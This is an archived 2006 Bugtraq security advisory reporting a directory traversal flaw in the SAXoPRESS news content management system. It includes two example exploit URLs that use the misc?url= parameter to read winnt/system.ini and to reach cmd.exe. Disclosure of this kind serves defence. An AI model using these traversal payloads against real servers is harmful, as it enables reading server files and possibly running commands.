| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20060411153716.3306.qmail@securityfocus.com> Date: 11 Apr 2006 15:37:16 -0000 From: securiteam@...asec.no To: bugtraq@...urityfocus.com Subject: SAXoPRESS - directory traversal SAXoPRESS is a content management system, mainly used for news publishing. A vulnerability exists in SAXoPRESS, which allows malicious users to read the contents of files on the server, and possibly execute arbitrary commands. Example exploit: http://example.com/apps/pbcs.dll/misc?url=../../../../../../../../../../winnt/system.ini http://example.com/apps/pbcs.dll/misc?url=../../../../../../../../../../winnt/system32/cmd.exe Affected versions: unconfirmed
Powered by blists - more mailing lists